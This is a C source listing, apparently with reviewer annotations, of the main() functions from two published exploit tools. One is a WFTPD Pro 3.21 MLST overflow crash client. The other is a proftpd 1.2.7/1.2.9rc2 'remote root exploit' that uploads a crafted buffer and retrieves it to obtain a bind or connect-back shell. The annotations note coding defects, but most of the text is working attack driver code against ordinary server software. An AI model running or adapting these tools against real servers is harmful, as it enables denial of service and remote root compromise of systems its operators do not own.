/*
 * Entry point of the published WFTPD Pro 3.21 "MLST" crash-test client.
 * Connects to <TargetHost>:<TargetPort>, logs in with the hard-coded
 * anonymous credentials, issues PASV once, then sends 60 MLST commands whose
 * argument grows by one byte per iteration starting at OVERFLOWSIZE (500 ms
 * apart), and finally sends QUIT and tears the socket down.
 *
 * Depends on file-scope names not visible in this listing: OVERFLOWSIZE,
 * BUFFSIZE, sendbuf, recvbuf, show, create_socket(), client_connect(),
 * loginftp(), writebuf(), readbuf().
 *
 * Review notes (code left exactly as published):
 *  - `void main` is not a conforming signature; with `int main` the early
 *    `return;` on usage/socket errors could report a nonzero status.
 *  - Nothing checks that OVERFLOWSIZE + 60 <= BUFFSIZE; the memset of `size`
 *    bytes and the stores at sendbuf[size-2]/[size-1] overrun sendbuf if the
 *    two constants disagree — TODO confirm against their definitions.
 *  - The "buff size" printf pairs %d with a size_t (strlen); %zu is correct.
 *  - loginftp()'s result is not checked, so the loop runs after a failed login.
 *  - exit(-1) on a failed connect skips closesocket()/WSACleanup().
 *  - `port` and `ip` are declared but never used.
 *  - The collapsed one-line form of this function ran everything after
 *    "//send QUIT" as a comment; the line structure below is the evident
 *    original layout.
 */
void main(int argc, char *argv[])
{
    WSADATA wsa;
    unsigned short port;            /* unused */
    unsigned long ip;               /* unused */
    char user[32] = "anonymous";    /* hard-coded anonymous login */
    char pass[32] = "anonymous";
    int i;
    char *command = "MLST ";        /* command prefix copied over the 'A' fill */
    SOCKET s;
    int size = OVERFLOWSIZE;        /* total bytes sent per MLST, grows each loop */

    printf("WFTPD Pro Server 3.21 MLST DoS Exploit\r\n");
    printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");

    if(argc < 3) {
        printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
        return;
    }

    WSAStartup(MAKEWORD(2,2),&wsa);
    if((s=create_socket())==0) {
        printf("[-] ERROR: Create socket failed.\r\n");
        return;
    }
    /* atoi() gives no error indication for a malformed port argument. */
    if(!client_connect(s, argv[1], atoi(argv[2])))
        exit(-1);

    loginftp(s, user, pass);        /* return value not checked */

    /* One PASV round-trip before the MLST loop; reply is read and discarded. */
    memset(sendbuf, 0 ,BUFFSIZE);
    memcpy(sendbuf, "pasv\r\n", 6);
    writebuf("Send pasv", s, sendbuf, 6);
    readbuf("read", s, recvbuf, BUFFSIZE);

    /* 60 MLST commands, each one byte longer than the last; CRLF is written
     * in the last two bytes of the 'A'-filled region. */
    for(i=0;i<60;i++,size++) {
        memset(sendbuf, 0, BUFFSIZE);
        memset(sendbuf, 'A', size);
        memcpy(sendbuf, command, strlen(command));
        sendbuf[size-2] ='\r';
        sendbuf[size-1] ='\n';
        printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);   /* %d vs size_t */
        show=1;                     /* presumably makes readbuf() echo the reply — confirm */
        writebuf("Send overflow buff", s, sendbuf, size);
        readbuf("read", s, recvbuf, BUFFSIZE);
        Sleep(500);
    }

    /* send QUIT; the reply read and early return were disabled by the author */
    memset(sendbuf,0, BUFFSIZE);
    sprintf(sendbuf, "%s\r\n", "QUIT");
    writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
    //show=1;
    //readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);
    //return;

    if(s) closesocket(s);
    WSACleanup();
}
/*
 * Entry point of the published proftpd 1.2.7/1.2.9rc2 exploit client.
 * Parses -d/-t/-u/-p/-l/-h/-o, logs in, uploads a file built by
 * createbuffer() with STOR over an active-mode (PORT) data connection on a
 * fixed local port, then closes everything, reconnects, logs in again and
 * retrieves that file twice with RETR on consecutive local ports — the
 * second time with `getshell` set.
 *
 * Depends on file-scope names not visible in this listing: server, type,
 * targets, v, cbhost, pt, bindmethod, sockfd, sockfd1, sockfd2, mustread,
 * getshell, PORT, VER, SIZE, BIGSIZE, usage(), quit(), client_connect(),
 * loginftp(), setport(), setfilename(), setascii(), createbuffer(),
 * storbuf(), retrbuf(), readbuf().
 *
 * Review notes (code left exactly as published):
 *  - Implicit-int `main` is not valid C99 or later.
 *  - `c` is a `char` compared against EOF while getopt() returns int; where
 *    `char` is unsigned the loop can never terminate.
 *  - usage(argv[0]) is treated as non-returning (execution continues as if
 *    it exits) — TODO confirm; `return 1` after it in `default:` suggests it
 *    may return, in which case an out-of-range `type` is kept.
 *  - `sizeof(targets)/sizeof(v)` only counts elements if `v` is the element
 *    type of `targets` — cannot confirm from this listing.
 *  - socket(2,1,0) hard-codes the Linux values of AF_INET/SOCK_STREAM.
 *  - The password is taken from argv and is therefore visible to other
 *    local users via the process list.
 *  - `j`, `a`, `b` and `cmdbuf` are never used here.
 *  - Several comments were fused onto code in the collapsed one-line form;
 *    the layout below restores the evident original separation.
 */
main(int argc,char **argv)
{
    char buffer[BIGSIZE];
    char cmdbuf[SIZE];              /* unused */
    char srvbuf[SIZE];
    char filename[30];
    int j,a,b,port1;                /* j, a, b unused */
    int total;
    char c;                         /* should be int: compared with EOF */
    char *user=NULL;
    char *pass=NULL;
    char *localip=NULL;

    if(argc<2)
        usage(argv[0]);

    while((c = getopt(argc, argv, "d:t:u:p:l:h:o:"))!= EOF) {
        switch (c) {
            case 'd':
                server=optarg;
                break;
            case 't':
                type = atoi(optarg);
                /* 1-based index into targets[]; see note on sizeof(v) above */
                if((type > sizeof(targets)/sizeof(v)) || (type < 1))
                    usage(argv[0]);
                break;
            case 'u':
                user=optarg;
                break;
            case 'p':
                pass=optarg;
                break;
            case 'l':
                localip=optarg;
                break;
            case 'h':
                cbhost=optarg;
                break;
            case 'o':
                pt=atoi(optarg) & 0xffff;   /* clamp to 16-bit port range */
                break;
            default:
                usage(argv[0]);
                return 1;
        }
    }

    if(server==NULL || user==NULL || pass==NULL || localip==NULL)
        usage(argv[0]);

    printf("@---------------------------------------------------------@\n");
    printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("-----------------------------------------------------------\n");
    printf("[+] Ret address:%p\n",targets[type-1].ret);

    /* No -h host means bind mode; otherwise require a parseable IPv4 literal. */
    if(cbhost==NULL)
        bindmethod=1;
    else {
        if((int)inet_addr(cbhost)==-1) {
            printf("[-] Invalid connect back host/ip\n");
            exit(0);
        }
        bindmethod=0;
    }

    port1=34568;    /* local port announced in the PORT command */

    sockfd=sockfd1=sockfd2=0;
    sockfd=socket(2,1,0);           /* AF_INET, SOCK_STREAM as raw numbers */
    if(client_connect(sockfd,server,PORT)<0)
        quit();
    loginftp(user,pass);
    //port1=setpasv(); //get the pasv port
    setport(localip,port1);
    setfilename(filename,30);
    setascii();
    total=createbuffer(buffer,BIGSIZE,type,cbhost);
    //printf("[+] buffer data size:%d\n",total);
    storbuf(filename,buffer,total,port1);

    /* STOR done: close all sockets and reconnect for the RETR phase */
    close(sockfd);
    close(sockfd1);
    close(sockfd2);
    sockfd=socket(2,1,0);
    if(client_connect(sockfd,server,PORT)<0)
        quit();
    /* reconnect */
    loginftp(user,pass);
    setascii();
    setport(localip,port1);
    /* a new data port for this transfer; mustread tells retrbuf how much to expect */
    mustread=total;
    retrbuf(filename,buffer,total,port1);
    readbuf("The First time read",sockfd,srvbuf,SIZE);

    port1++;
    setport(localip,port1);
    mustread=total;
    getshell=1;                     /* second RETR: presumably switches retrbuf() into interactive mode — confirm */
    retrbuf(filename,buffer,total,port1);
    quit();
}